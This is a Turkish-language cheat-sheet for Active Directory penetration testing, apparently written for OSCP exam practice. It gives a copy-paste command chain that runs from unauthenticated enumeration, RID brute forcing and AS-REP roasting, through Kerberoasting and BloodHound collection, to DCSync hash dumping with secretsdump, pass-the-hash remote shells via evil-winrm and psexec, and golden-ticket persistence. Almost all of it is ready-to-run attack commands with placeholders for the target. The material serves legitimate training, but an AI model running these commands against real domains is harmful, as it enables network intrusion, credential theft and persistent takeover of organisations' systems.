FOOTHOLD Metodoloji Cheat-sheet
Recon ✓ EXAM-SAFE orta :88:135:139:389:445:464:636:3268:5985

AD Hizli Komut Akis Sablonu: No-Creds -> User -> Domain Admin (Tek Sayfa)

Kopyala-calistir komut akisi: kimlik yokken (nxc null, enum4linux, kerbrute, GetNPUsers) -> kullanici elde edince (nxc dogrula, GetUserSPNs, bloodhound-python) -> Domain Admin'e (secretsdump DCSync, evil-winrm, golden ticket) giden minimum komut zinciri. Sira halinde, her satir bir TOKEN ile.

Bilgi: ÖN KOŞULLAR
  • Hedef ag ile baglanti
  • DC_IP ve DOMAIN tespiti
  • Senkronize saat (ntpdate) ve /etc/hosts'a eklenmis DC FQDN
┌──

Komutlar

nxc ✓ EXAM-SAFE
nxc smb {{DC_IP}} -u '' -p '' --shares
AKIS 1 (no-creds): null session ile domain adi, share ve signing durumunu cek NetExec Wiki — Null session enumeration
nxc ✓ EXAM-SAFE
nxc smb {{DC_IP}} -u guest -p '' --rid-brute 10000
AKIS 1 (no-creds): guest/null ile RID brute force yaparak kullanici adlarini cikar NetExec Wiki — RID brute forcing
kerbrute ✓ EXAM-SAFE
kerbrute userenum -d {{DOMAIN}} --dc {{DC_IP}} {{WORDLIST}}
AKIS 1 (no-creds): Kerberos pre-auth ile gecerli kullanici adlarini dogrula (lockout tetiklemez) ropnop — Kerbrute userenum
impacket-GetNPUsers ✓ EXAM-SAFE
impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile users.txt -no-pass -format hashcat
AKIS 1 (no-creds): AS-REP Roasting — preauth'suz kullanicilarin crackable hashini topla HackTricks — AS-REP Roasting
nxc ✓ EXAM-SAFE user
nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}}
AKIS 2 (user): elde edilen kimligi dogrula — [+] = gecerli, (Pwn3d!) = local admin NetExec Wiki — Credential validation
impacket-GetUserSPNs ✓ EXAM-SAFE user
impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash
AKIS 2 (user): Kerberoasting — SPN'li servis hesaplarinin TGS hashini cek, hashcat 13100 ile crackle HackTricks — Kerberoasting
bloodhound-python ✓ EXAM-SAFE user
bloodhound-python -d {{DOMAIN}} -u {{USER}} -p {{PASS}} -ns {{DC_IP}} -c All --zip
AKIS 2 (user): tum domain'i grafa cek, Shortest Path to DA sorgusuyla yukselme yolunu bul BloodHound Docs — bloodhound-python
impacket-secretsdump ✓ EXAM-SAFE domain-admin
impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}
AKIS 3 (DA): DCSync ile krbtgt dahil tum domain hashlerini cek HackTricks — DCSync
evil-winrm ✓ EXAM-SAFE admin
evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}}
AKIS 3 (DA): Pass-the-Hash ile WinRM (5985) uzerinden interaktif shell al HackTricks — Evil-WinRM Pass-the-Hash
impacket-psexec ✓ EXAM-SAFE admin
impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}}
AKIS 3 (DA): elde edilen NT hash ile SYSTEM shell (Pass-the-Hash psexec) HackTricks — Pass the Hash with Impacket

Genel Bakis

Bu sayfa, ad-method’un kavramsal akisini kopyala-calistir komut zincirine indirger. Uc bant var: kimlik yokken (AKIS 1), bir kullanici elde edince (AKIS 2), Domain Admin’e ulasinca (AKIS 3). Her komut yalnizca degisken token’lar icerir; variable bar’da {{DC_IP}}, {{DOMAIN}}, {{USER}}, {{PASS}}, {{NTHASH}} doldurulunca tum akis kosturulebilir hale gelir.

Hizli Kurulum (her oturum basinda)

DC’yi /etc/hosts’a ekle ({{DC_IP}} {{DC_HOST}} {{DOMAIN}}), saati senkronla (sudo ntpdate {{DC_IP}}). Bu iki adim atlanirsa Kerberos araclari sessizce basarisiz olur.

AKIS 1 — No-Creds (kimlik yok)

Sira: nxc smb null/guest ile domain ve share -> --rid-brute ile kullanici adlari -> kerbrute userenum ile dogrulama -> GetNPUsers ile AS-REP Roast. Cikan hashleri hashcat -m 18200 ile crackleyip ilk kimligi uretirsin. Kimlik cikmazsa elde ettigin kullanici listesiyle password spray’e gec (bkz. ad-spray).

AKIS 2 — User (bir kimlik var)

Sira: nxc smb ile kimligi dogrula ((Pwn3d!) gorursen zaten local admin’sin) -> GetUserSPNs -request ile Kerberoast -> bloodhound-python -c All ile graf cikar. BloodHound’da foothold kullanicisini Mark as Owned isaretle ve Shortest Path to Domain Admins sorgusunu calistir; ekrandaki kenar (edge) sana hangi sayfaya gidecegini soyler (GenericAll -> ad-acl-abuse, CanPSRemote -> evil-winrm, AllowedToDelegate -> ad-deleg-constrained vb.).

AKIS 3 — Domain Admin (yetki yukseldi)

Replikasyon hakki/DA elde edince: secretsdump -just-dc ile DCSync -> her hash ile Pass-the-Hash (psexec -hashes :{{NTHASH}} veya evil-winrm -H {{NTHASH}}). krbtgt hashiyle Golden Ticket uretip persistence kurabilirsin (bkz. ad-tickets).

Notlar ve Tuzaklar

  • Bir crack edilen parola hemen yeni bir spray adayidir; akislari iteratif kullan.
  • nxc ciktisindaki (Pwn3d!) etiketi o kimligin hedef makinede local admin oldugunu gosterir — AKIS 2’den dogrudan AKIS 3’e atlatabilir.
  • NT hash’in aad3b435...:31d6... formatinda LM:NT geldiginde impacket’e -hashes :{{NTHASH}} (LM bos) ver.
  • Tum bu komutlar OSCP-safe’tir; relay/poison adimlari bu cheatflow’a dahil degildir cunku interaktif ortam gerektirir.
┌──

Kaynaklar

↗ HackTricks — Active Directory Methodology↗ WADComs — Active Directory cheatsheet↗ The Hacker Recipes — AD
0/15 set